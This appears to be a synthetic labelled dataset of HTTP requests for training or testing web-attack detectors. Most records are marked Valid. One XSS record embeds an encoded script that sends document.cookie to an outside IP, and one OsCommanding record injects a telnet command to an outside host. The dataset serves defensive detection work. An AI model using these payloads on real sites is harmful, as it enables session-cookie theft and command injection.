Referer: /ibnf3/Ctkfwurd/neckzh5u/esatoo/rtne8nt.msf
TE: chunked;q=0.3
Trailer: From
User-Agent: lfozagMjI http://www.bmOr7XOc.gov
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6564x871
Via: 7.6 71.231.85.182
Transfer-Encoding: compress
Upgrade: esochH/3.1, ehsqp/5.4, atmg/1.6, Aulr/8.6
Warning: 097 84.156.203.77 "rilteriyvagst2t" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

x.LvarDUVbgsoundO=ekt9ehdTsrpd&iG-oJ=rtIiZt8yY&ohio=5431242&lEOmxe7oery=%w[k&pyUcP=64999365&eeNooiats3c1ii=1686741&4ld7krrn=sNDnmf9B8Ab&vbscriptEBLacceptlO=\=n tnE&rqtHA_c=/updatemnrulspsr vd&uosriih5ioopoSt=o8_&ealeoirbjEE=8245543&ir=gJoq_X2tvV_c&s0vqdeeg=Lnu8c&InTt=ycs|

End - Id: 6289
Start - Id: 46975
class: XSS
GET /82Lusdyt1todsr/UBdocument18p/aseenebnosisVianlr/x.tBbxuEGdydH0-o@-P/s6Iv53Qi2sgmwHfIe/eHho5ursaptaowi/nersraSgeEeaime/k8psBJlYc/OA1IFJM/deletekw@rB-ncRqJICe/so@jtfBum9p.y83LUO.png?citieut=eodNE&idwzboodtabc=0318352&j8=78o&i6iec=izWM1qH&qg5e=meiconrfniznhdDplr&UpMIYMsM=26&echoRVO7_X=%3C%3Cscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F13.175.224.120%2Ftaor.dll%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E&nyazpouWub7d=atteedebonf3tat1 HTTP/1.1
Host: www.brnsc8de.gov:47155
Connection: close
Accept: video/quicktime, audio/*, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 28.22.243.204
Cookie: jttAi=19602;am=gP6kK;P54NOqhOwget8eY=82jr-ytZDWEP;ute4t=8xhIXArvL_
Cookie2: $Version="8"
Date: Thu, 29 Jun 06 11:47:42 GMT
ETag: "h@Zbg9WOjH7q9a0GDxE"
Expect: lirmAu=bfd2
If-Modified-Since: Sun, 15 Oct 06 13:53:38 CET
If-Unmodified-Since: Thu, 18 Oct 07 22:16:30 CET
If-Match: *
If-None-Match: "xuCeH@Vw4RVR34kI@Y8"
If-Range: Fri, 23 Jul 04 10:17:27 CET
Max-Forwards: 627
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: NTLM cnRkc2xvb3dwZHJqNXJlb3RlczJvd3BvdGRzbm5ncHZhc1RhdWFm
Range: -299,87-,670-62
Referer: http://Atnt.ch/eekapr/nmStiRa.ace
TE: deflate,deflate,chunked;q=0.0
User-Agent: vMSXape.D http://www.c97ena.be
UA-Disp: 2976,173,32
UA-Pixels: 199x2885
Via: FTP/6.1 10.144.201.252, ve38li/3.2 www.besdtn.tiff
Transfer-Encoding: compress
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 195 www.3bqBag.jpeg:1971 "ytfirbindsSon4she" 
X-Serial-Number: 68033116014
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46975
Start - Id: 8581
class: Valid
GET /fGW_Wyon/hXd1/6s/unFl_.fJIvvh/Iy1LNGo5gMy/dYy0/qa/eErSGeMK/u5Oa_rvQJ-/w0vfDCxMwvvX/2pwCamMYY.dll? HTTP/1.0
Host: www.otsonegic.ch:63523
Connection: keep-alive
Accept: text/*, image/*;q=0.0, text/*
Accept-Charset: euc-kr
Accept-Encoding: deflate, identity;q=0.8
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 30.77.25.38
Cookie: wtcnana= bee;53s=tBehJ7Sx;nziqa8ris=chrn;s8rAqat4sceeeCe=uott2nygohonktbt
Cookie2: $Version="6"
Date: Wed, 22 Dec 04 05:33:08 GMT
ETag: "-@N4XaxSPUJPIje5DP"
Expect: iIeea=hhls;evsai
From: ebpee@y0et.gov
If-Modified-Since: Wed, 09 Nov 05 22:19:54 UTC
If-Unmodified-Since: Tue, 27 May 08 07:54:07 UTC
If-Match: "pSI9.JEa6v1XRZVy"
If-None-Match: *
If-Range: Thu, 30 Jun 05 07:57:21 CET
Max-Forwards: 571
MIME-Version: 0.8
Pragma: mtrLeyhg=iheoa
Proxy-Authorization: NTLM RWUxYWVxcnJzaWt3ZWxzZHVpZW1kZXJzaW00bWZyenNpcmxpbWVpOWY2Ug==
Authorization: ooY0e qeppsle=ystrfo
Range: -281,776-17139
Referer: /sNse.cgi
TE: deflate,trailers,chunked;q=0.2
Trailer: Connection
User-Agent: Mozilla/8.2 (X11; U; Open BSD i586 8.8; na-se; rv:7.6.5) Gecko/48583870
UA-CPU: Sparc
UA-Disp: 5974,9277,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 783x6311
Via: FTP/5.6 185.250.45.223, ixtn/8.0 5.0.129.170
Transfer-Encoding: gzip
Upgrade: PxnR/1.4, fotka/2.5
Warning: 294 www.tpriIw.html "evdBEd" 
X-Forwarded-For: 130.166.17.51
X-Serial-Number: 1101244
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8581
Start - Id: 33268
class: Valid
PUT /olZASN/4hanvdaEtTvu1oO3gal/oetkUpumetgwS0aa/window.openi68_FBNybzp/wpassthruU7g8qNa@gHN/E9upai0tot1or/a4Vz@cLJ/g2.shtml? HTTP/1.0
Content-Length: 80
Content-Language: rt,ifheS,lgi
Content-Encoding: identity
Content-Location: /taohi/arEqo/oaEmes/ohndnpir/essn7eea.js
Content-MD5: c1J1SGFBbWFmcGlqbmFpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 May 04 14:10:10 UTC
Last-Modified: Thu, 26 Feb 09 09:42:31 CET
Host: 104.232.229.153
Connection: keep-alive
Accept: image/gif;q=0.5
Accept-Charset: x-mac-greek;q=0.4, cp-932;q=0.1, iso-8859-1;q=0.4
Accept-Encoding: gzip;q=0.0, compress;q=0.5
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 17.231.141.238
Cookie: 1v9he1wpr5i=xt1Rveyrst;HeaoNEnis=406;YUm_=nH6arsaesbadon;e66meznw=innia9w
Cookie2: $Version="490"
Date: Sat, 29 Apr 06 21:21:09 UTC
ETag: W/"vj8wTgBR@25qmjKFMti"
Expect: hou2r
From: oeunn0@celeoof.com
If-Modified-Since: Thu, 27 Nov 08 12:50:57 CET
If-Unmodified-Since: Sun, 16 Jul 06 09:25:32 CET
If-Match: "xEQXDIrGfp.KQry"
If-None-Match: *
If-Range: *
Max-Forwards: 48
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM c1BoWW1uMmxyZWx0Y2lvYXJvZWhJeHBqMGNpZ2U2ZmFvc2VMYndo
Authorization: Digest nonce
Range: 659776-,87434-,7-715
Referer: /natwocp/jagupp/Ip3Uns.js
TE: trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/0.9 (Machintosh; U; PPC 3.0; wg-ei; rv:5.1.9) Gecko/74605064
UA-CPU: x86
UA-Disp: 088,074,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8624x050
Via: 6.6 155.222.229.85, 6.6 www.taiQ.js
Transfer-Encoding: aiu3o
Upgrade: olEewx/5.1
Warning: 910 234.225.193.151 "naree6mikAougsere" "Tue, 09 May 06 10:02:02 CET"
X-Forwarded-For: 220.33.220.61
X-Serial-Number: 09187614917730
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

ltilhte6r=sNoNese&dIF5IbS77%utmp=7vAZMFhGz6&gn=90970&hrstaAvnma3sa4=+Tareg2%28oS

End - Id: 33268
Start - Id: 17277
class: Valid
GET /a-s9I1Vy6MDUa.js?ifeaChfdey0sd=rdse7azro&afuler7waupo5=%5C-esphpeforms&T@WbLLT=sc4mUIEdttnnert8e&uFUBxSyoF4=348&Oar=%27%25+ts6window.open%29%3B&uf3tedeN4e0iS=509582&stvbd=plddr&drohfhdttooaet=%40sEfhetne&tcaE=R%29tossr2&1enara=sqnqR8htnne HTTP/1.1
Host: 209.136.240.254:19
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=16
Client-ip: 68.43.213.56
Cookie: 3Hhtpassn=234149;agmailJvbscriptwT=fr;6yOqforms3mochaO=de0y;RxYkBY.6=3;nen709= ebSjeegrt1r
Cookie2: $Version="3"
Date: Tue, 26 Aug 08 16:14:06 CET
ETag: "zAGMJ7nN7fRLQUz4e"
Expect: 5mAttk
From: ahipt@bhraulhaa.fr
If-Modified-Since: Thu, 22 Mar 07 06:12:00 GMT
If-Unmodified-Since: Wed, 04 May 05 10:27:41 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: Renl8a oR9wl=ntEc1rn
Range: 09626-1394,221800-
Referer: http://www.tRttii.org/tnty/a1eui/brzoeh.php3
TE: trailers,gzip;q=0.2
Trailer: Accept-Encoding
User-Agent: nErje (eZNAv4)
UA-CPU: StrongARM
UA-Disp: 7151,7445,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 552x034
Via: 1.0 173.192.204.138, 3.2 www.0iC2.gif
Transfer-Encoding: deflate
Upgrade: omut/4.3, 2v0hp/4.8
Warning: 777 187.18.89.168 "Teh2ae2bls6aot" 
X-Forwarded-For: 153.184.197.192
X-Serial-Number: 835471798337
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17277
Start - Id: 12126
class: Valid
GET /euav7dEee6taeo/irN4fZcG-/tTGSYGPIi85mWq9xVfX/CauW9swYPscriptb@jU.jpg?sahsa=h_yonDz_SC&fd6nid=t7rQrB&oIghsunshld=osetavaozservices9%29aa&eeakothj4llrf=usr%26divt HTTP/1.0
Host: www.dhdhrtui.cz
Connection: close
Accept: video/quicktime;q=0.3, video/*;q=0.5, application/postscript
Accept-Charset: gb2312, iso-8859-4;q=0.7, windows-1250;q=0.7, windows-1257;q=0.9, iso-8859-6
Accept-Encoding: 
Accept-Language: djaaathe-w2
Cache-Control: only-if-cached
Client-ip: 44.139.162.200
Cookie: XpGsxQandK=vPipOnenfleumc
Cookie2: $Version="1"
Date: Mon, 08 May 06 04:31:10 UTC
ETag: W/"ho5Sih9G.uvcpPYV"
Expect: 100-continue
From: 1ygx3rl@zebdo07.net
If-Modified-Since: Sun, 28 Aug 05 23:53:40 CET
If-Unmodified-Since: Sun, 30 Sep 07 19:47:33 CET
If-Match: "wPzSl-O@5eIE3rKKbH0"
If-None-Match: *
If-Range: *
Max-Forwards: 8005
MIME-Version: 9.6
Pragma: i6e5=r
Proxy-Authorization: Digest nonce
Authorization: d5so lron=eth9ain
Range: 2-
Referer: /ojdssooz.conf
TE: trailers,gzip;q=0.2,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.7 (Windows; U; Win98 8.9; st-ns; rv:9.2.0) Gecko/86526379
UA-CPU: MIPS
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 556x8407
Via: FTP/2.8 www.Wetmoo.jpg, FTP/2.7 www.eobeen.htm:2
Transfer-Encoding: compress
Upgrade: Cdr/9.5, gton/2.2
Warning: 633 208.217.55.100 "oooedreIyoibnl" 
X-Forwarded-For: 114.221.1.72
X-Serial-Number: 180006771831212
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12126
Start - Id: 25860
class: Valid
GET /sIGyPfUdD90D/Y6Cincludepecho/t0gXohcahq3oul4h/tc/sotlwi.png?2oteo2amwmrid=deuRltaneneOwoopes&eRconnectwLlmRLL0c=2852&Eg9t4n1nne1z=641&nwt=eXYD9R&nku5mhcs=a&ncdodemeq3ht4v=ahoo&btslumn=07513808&a8ey6aubel=j HTTP/1.1
Host: www.Rdxgue.fr
Connection: keep-alive
Accept: text/html, video/mpeg;q=0.5
Accept-Charset: windows-1253;q=0.1, koi8, iso-8859-1, x-mac-ce, macintosh;q=0.1
Accept-Encoding: gzip
Accept-Language: 2frite-ryl1;q=0.0, z-nc, diso-edGanha;q=0.4, apn9ew-lpxut8cc;q=0.7, ies-r;q=0.6
Cache-Control: no-transform
Client-ip: 208.224.54.200
Cookie: ncrsiyxbj=ph5hetre n;s4=sOlibbetweendocumentiTn4wgeta;ribeTnn=stdin1seesmocha
Cookie2: $Version="596"
Date: Thu, 01 Oct 09 24:07:16 CET
ETag: W/"6MIaRp5ZKJjYE0qAeHSK"
Expect: 100-continue
From: ejAah@oon5i.ch
If-Modified-Since: Sun, 15 Mar 09 07:19:41 GMT
If-Unmodified-Since: Fri, 23 Apr 04 13:06:27 UTC
If-Match: "oMJ1m.MiWE7Rjg4Zc"
If-None-Match: "4UoVVd-9d@OgKwd"
If-Range: *
Max-Forwards: 5
MIME-Version: 2.6
Pragma: hboaUse=de
Proxy-Authorization: Digest realm
Authorization: Basic YkJlYW9vdU86amFmcw==
Range: -434
Referer: /tps6UOp.nsf
TE: chunked;q=0.9,trailers,gzip;q=0.2
Trailer: Accept
User-Agent: O8feCegenniieu
UA-CPU: 68000
UA-Disp: 587,0940,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 976x788
Via: 3.2 www.teoi6ll0.htm:10, HTTP/2.5 77.92.60.152
Transfer-Encoding: compress
Upgrade: IuMf/4.2, qotH/5.2, nsgah/4.2, nTi/6.8
Warning: 430 4.80.20.99 "go7tpeadnR8aoEojob8" "Wed, 21 Sep 05 10:38:47 CET"
X-Forwarded-For: 191.147.18.123
X-Serial-Number: 3343332973259151687
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25860
Start - Id: 3369
class: Valid
GET /i0oFC/rt4Gna03Ejryecnef/eerr/hLJ/n82fQhttpsv/iYnxP4hy/2oeSne92brto.asp? HTTP/1.1
Host: www.heecz1e.fr:80
Connection: canecOo
Accept: application/zip
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: Ee9u-E7s;q=0.8, ul-tTnt;q=0.9, lhat-3deola
Cache-Control: dvai='oepsPc'
Client-ip: 241.173.41.168
Cookie: eoemoaoc2tynO=heochildOPztmpr;S1G3htaccesgkVcopy=Uyigea]:t6S/usrfRe 
Cookie2: $Version="2"
Date: Mon, 26 Apr 10 16:40:28 UTC
ETag: W/"Wuorz4v88C6@85w"
Expect: nnr46=hUivsnge
From: mEt7Rt@xbaiymu.st
If-Modified-Since: Wed, 24 Dec 08 24:55:27 GMT
If-Unmodified-Since: Sun, 29 Jul 07 22:08:07 GMT
If-Match: *
If-None-Match: "j_QKbV28-BsHjIX"
If-Range: Sat, 26 Sep 09 14:47:49 UTC
Max-Forwards: 3418
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM bnVoYXVyNnJ4ZTdlZXVya3RzdG4xM3BzOWgzZGE1ZWxjcmF0
Authorization: NTLM bXhzNGQ0bGVEaG10c2VybDJpVnVlVGpvZnRldzdnaGVkZWN0c091bml1YW5s
Range: 8108-,6335-196
Referer: http://tOo5.org/ypdytek/5Gse/8unhtdt/ssanxn.html
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/3.5 (compatible; erhrbdrdbe; Solaris; etuhiith; ornr)
UA-CPU: MIPS
UA-Disp: 351,552,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0842x046
Via: 2.7 153.12.78.154, FTP/4.8 112.225.197.228, 0.6 111.124.75.228
Transfer-Encoding: deflate
Upgrade: 8geT/0.3, 4iurl/1.5, c8e/8.6, 4jjimf/2.7, mzei/6.0
Warning: 519 www.gtsm.gif "ueig4ostawratnEshj3i" "Sun, 02 Apr 06 10:02:56 UTC"
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 8869070380
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3369
Start - Id: 18177
class: Valid
GET /3ntol9i3e/iaxtrice9RoiTho/Ihaoo.css? HTTP/1.1
Host: 9.17.238.236
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: windows-1258;q=0.1, euc-tw;q=0.2, x-mac-turkish
Accept-Encoding: *;q=0.2
Accept-Language: I-er;q=0.2
Cache-Control: no-transform
Client-ip: 235.3.254.254
Cookie: aONMQ=e0aga(;ne=sxaecmIpcsiaitcb;feoCa=  3v jrtuh;
Cookie2: $Version="112"
Date: Tue, 24 Feb 04 21:10:43 UTC
ETag: W/"EwNu1@ChyBMDCdLM"
Expect: 100-continue
From: bsls@bhsx2cetl.be
If-Modified-Since: Mon, 19 Apr 04 15:08:40 GMT
If-Unmodified-Since: Wed, 14 May 08 08:40:51 UTC
If-Match: *
If-None-Match: "j1JGS-@ozVNlrNF9L9pC"
If-Range: Mon, 22 Dec 08 17:53:50 GMT
Max-Forwards: 2982
MIME-Version: 2.5
Pragma: 5reeo=ble
Proxy-Authorization: Digest algorithm=MD5
Authorization: naLg Afdecvbr=tiaol0d
Range: -639
Referer: /thsub.mspx
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: aGu6l/0.5.8.2
UA-CPU: MIPS
UA-Disp: 904,033,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3922x0648
Via: 5.1 www.oHmeed.html, 8.3 www.idlne.gif:16939
Transfer-Encoding: compress
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 282 www.mtd6lng.tiff "rqniee0sohncxoe" 
X-Forwarded-For: 53.225.75.3
X-Serial-Number: 4999620100114166979
----: ------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18177
Start - Id: 34468
class: Valid
POST /sCUV/ld/j9llwxaz/EVY4Lo3/gx@nl2CDMp27Bf/eIoesgnserwsdarrei/6ai95VmOJvy/eyn/jiap1tgdHae/cg4KOeEU@LkqL@/asetpocvhDfS9/zVINMpq-3RF6i.jpg? HTTP/1.1
Content-Length: 19
Content-Language: vseRnlut,wwllIn,sy
Content-Encoding: deflate
Content-Location: /oeohcbn/it4egh/aes4eit.doc
Content-MD5: NWVvY25NaXMyTzN0MHNnaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Apr 10 01:08:00 UTC
Last-Modified: Sun, 13 Apr 08 01:32:00 UTC
Host: 104.154.239.149
Connection: aauh
Accept: audio/*, application/*, audio/*;q=0.4
Accept-Charset: x-mac-roman;q=0.7, x-mac-chinesetrad;q=0.0, ks_c_5601-1987;q=0.7, windows-1253
Accept-Encoding: deflate;q=0.1, gzip, compress;q=0.8, deflate;q=0.3
Accept-Language: oair-ll2hmel;q=0.4, 9-tesnAeho;q=0.9, h-hba, n7urlfsr-Eny6
Cache-Control: no-cache
Client-ip: 54.105.137.188
Cookie: tNhc=l3gq3i
Cookie2: $Version="693"
Date: Sat, 30 Dec 06 07:37:34 CET
ETag: W/"nBQjQ7WJ6aZqTS0JeF"
Expect: 4ret=wd1dh
From: nS63m@sntnm9.biz
If-Modified-Since: Tue, 06 Feb 07 22:29:38 CET
If-Unmodified-Since: Fri, 30 Jan 04 02:50:56 GMT
If-Match: "ftAHvbSmZj0BsIH"
If-None-Match: "y0WdjgjMU3hpAEWCJMe"
If-Range: *
Max-Forwards: 57
MIME-Version: 8.5
Pragma: sbsenxsp=irw
Proxy-Authorization: NTLM YUgxVGhpb1JibmtDdW5lUHJ6d293aWVhaWVlb2VpdWFycnllM1NodWl0ZG9t
Authorization: Digest qop=auth
Range: -297940,-256390
Referer: http://www.niar.biz/ioattn/d3DnheBe.asmx
TE: trailers
Trailer: Date
User-Agent: oiZwVuEh http://www.hmsisvuh.gov
UA-CPU: StrongARM
UA-Disp: 563,2938,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3150x9630
Via: nesi/5.2 www.nflpri.tiff, 8.9 70.124.32.151, 7.5 115.54.99.12
Transfer-Encoding: gzip
Upgrade: qznwTA/9.2, ouaxel/9.6, enlLl/2.8, tst8as/3.5
Warning: 184 116.163.25.21 "wlye" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 2852435165133
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

6Ka91etcEt=raafrcwC

End - Id: 34468
Start - Id: 16161
class: Valid
GET /fS698WYmg0P04a35/cteodr6nlnt3i/adhAniesgcb4tniE/ba6/hu907xT-03WhI@eLuS/Pcoh2Idordecaiol/tde1eledegd2enh/xiH/tC3JTyumTV0LH_tNjn/csv/dd/K.S-zG.js? HTTP/1.1
Host: 127.103.97.141:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251, x-mac-chinesetrad, x-mac-chinesesimp;q=0.5
Accept-Encoding: compress, identity;q=0.6, deflate
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 163.65.92.102
Cookie: BBQr4B4teRb=24898
Cookie2: $Version="737"
Date: Fri, 05 Dec 08 01:25:23 GMT
ETag: "RPeD2251fsD7P4nBAkey"
Expect: 100-continue
From: nt6y@jrn3wp.st
If-Modified-Since: Sat, 26 Aug 06 24:16:00 UTC
If-Unmodified-Since: Tue, 16 Mar 04 08:52:57 GMT
If-Match: "lloHo.M9gUOxnukUACA"
If-None-Match: *
If-Range: "f58y7ul1uVdgUuMO"
Max-Forwards: 407
MIME-Version: 7.0
Pragma: hYn='euAgg'
Proxy-Authorization: Basic bWFsZ2VvbTpzR2huZG8=
Authorization: Digest qop=auth-int
Range: 1-799844
Referer: /haon.jpg
TE: gzip;q=0.9,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 3.1; tu-ta; rv:5.6.8) Gecko/61305754
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 4.9 197.175.228.238
Transfer-Encoding: gzip
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 823993
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16161
Start - Id: 43126
class: OsCommanding
GET /f8v/xp4e1Jwhere1rcpEinsertk/tsAblPWuge7VT7pi/tsbUnegwrLGdyaitqt.nsf?aa=%22+++++%3B++telnet++++165.67.206.197+80%3B&Elmsaw3aiu=47300&fetoit7bn6=w1g0Ra9 HTTP/1.0
Host: www.OBa31en.be:13
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=563
Client-ip: 147.97.228.238
Cookie: iw0ho=74;FnQ998XMFw5=eo
Cookie2: $Version="87"
Date: Fri, 02 Oct 09 10:10:17 UTC
ETag: W/"Cv3aZiHwV@pvaMWbTtE"
Expect: 100-continue
From: ydaj1@ewfas0rh.de
If-Modified-Since: Mon, 02 Jul 07 15:12:38 CET
If-Unmodified-Since: Tue, 10 Jan 06 01:09:37 GMT
If-Match: "_B1PA@t2dZ3tRN0"
If-None-Match: *
If-Range: Wed, 23 Apr 08 17:08:31 UTC
Max-Forwards: 9774
MIME-Version: 9.7
Pragma: kae='nrif'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: Digest uri=http://ehobetU.st/3ngtancL/trar.php4
Range: 94856-,22-022
Referer: /ycpe6wl/edmozbn/lt1uas/iRho.bin
TE: deflate;q=0.7,deflate,deflate
Trailer: Host
User-Agent: Mozilla/4.1 (X11; U; SunOS sun4u 4.0; rs-gE; rv:1.0.6) Gecko/46981394
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.9 www.ltekati.gif, FTP/0.1 204.183.65.54, 0.2 www.iewsdn.png
Transfer-Encoding: identity
Upgrade: ftb/0.9, eeti/9.1
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43126
Start - Id: 19104
class: Valid
GET /eWa5HXbC/2siEouT/THj27enZMwmCg7D/sa/h6eibsntyinoseehna/kKFp_/mBep.lQqP/j4Ywu/sQM9C5f7/segeshbeuIdsili/eZ-5jWGPmvxOR7/hhrahsasdmvoacsmmndt.css?jyP=yx&S-WY-4=xI%7EZ++oemmochaj%24x+sxrt&nesZPhmw650a=mqlcensowetativ&r4n2=%7Ecst%29o1o&dssn0otlsr=4wHTeo%2F4&Ceem=c7+&geytdrnoc=a6NQ&yDh0rgaleaw7eh=iTusmdieaV0kt&teesahehbpyTnEm=s1o-i&qot1fco1unnia=nreN&aoaOleatt=696816424 HTTP/1.0
Host: www.nhcws48nc.org:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.1, deflate;q=0.3
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 228.207.13.159
Cookie: tj=eY0zr.G
Cookie2: $Version="47"
Date: Sun, 01 Feb 04 12:08:31 GMT
ETag: W/"ybTiqqPUXJhv01KIDA9"
Expect: 100-continue
From: dvelvane@qhwetaoqup.st
If-Modified-Since: Fri, 14 Jul 06 06:16:07 CET
If-Unmodified-Since: Wed, 03 Dec 08 11:20:56 GMT
If-Match: "cK8c-IUu9dQ2-GoYO"
If-None-Match: *
If-Range: Thu, 17 Jan 08 03:48:20 CET
Max-Forwards: 0
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://rhDeEzl.com/8Sfrs8nS.tiff
Authorization: Digest nonce
Range: 2-,-0,87927-654
Referer: http://www.esd2.de/pubo5sF/saars1t.nsf
TE: gzip;q=0.0,trailers,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: hji-ZAlY http://www.r0ct.biz
UA-CPU: x86
UA-Disp: 2540,4307,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 315x9224
Via: 5.5 www.ozrtln.htm:427, 3.4 www.zirUrno.jpeg, 1.2 129.208.79.204
Transfer-Encoding: deflate
Upgrade: uh18/7.6, a1w/5.6, ydmr/7.2, o5j/2.9, rmIai/6.0
Warning: 947 www.RRed.htm "sieaizuOuewergir" "Sun, 14 Nov 04 07:40:45 UTC"
X-Forwarded-For: 31.76.137.109
X-Serial-Number: 4037701883
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19104
Start - Id: 714
class: Valid
GET /eoDjTqfucdNg4YSZG/tYhYRSZ/nolntdnhqEoon9qmmox.html?jdlE9teKRigifih=%3D6sYpta HTTP/1.1
Host: 53.255.227.110
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-2022-kr, x-mac-cyrillic, iso-8859-5
Accept-Encoding: 
Accept-Language: Cttii56-erfea
Cache-Control: no-store
Client-ip: 150.71.204.17
Cookie: ftpua_P@tmpI0kz=union Ae0w
Cookie2: $Version="090"
Date: Wed, 17 Nov 04 23:30:08 UTC
ETag: W/"0ono9sHSJAuIbLe"
Expect: idnthE
From: nner@duenesjfts.gov
If-Modified-Since: Sun, 03 Jul 05 18:28:33 UTC
If-Unmodified-Since: Tue, 11 Apr 06 10:09:41 GMT
If-Match: "ci_4cVpwWfsdIClOPM"
If-None-Match: *
If-Range: Wed, 30 Apr 08 11:24:56 GMT
Max-Forwards: 73
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Etbt arcaHe=htphh
Range: 2-
Referer: /eqdthnti/ocno/aeie1/nuTo/nRorheit.cgi
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/3.2 (compatible; Konqueror/1.3; Mac OS X; ttIsuEheah)
UA-CPU: Sparc
UA-Disp: 689,479,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 180x0493
Via: FTP/6.3 www.eenla.html
Transfer-Encoding: gzip
Upgrade: 9amai/2.9, ltd/1.9, TsDetE/7.2, bl0wa1/1.8
Warning: 520 45.172.65.140 "engziBmdai" "Mon, 31 Oct 05 05:12:28 UTC"
X-Forwarded-For: 110.150.254.187
X-Serial-Number: 40090704001637847095
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 714
Start - Id: 23653
class: Valid
GET /nXiZpQQQhSD6YEH/eii/k3se4lqeiHczg/DX1G02Nscript7exec3/tb1slcrNesiid/wmvdnut/s4mdt/i9d2siaeiy/eEa0uidoe/Reallq@E-ERr4V/iYDmNW/iaayut.php4?tL9=12380&n4kiesrnm=45827 HTTP/1.1
Host: www.uslkeqgmwh.gov
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-icelandic, utf-8;q=0.1, x-mac-turkish, windows-1255;q=0.5
Accept-Encoding: *
Accept-Language: et-1, rpdcty5-hed, isnb-Rao
Cache-Control: max-age=8
Client-ip: 131.237.149.176
Cookie: WbLBI3ifupdatePZ=rS1H4dDR;dtol=3317870470;rOed7EashshNs=655
Cookie2: $Version="287"
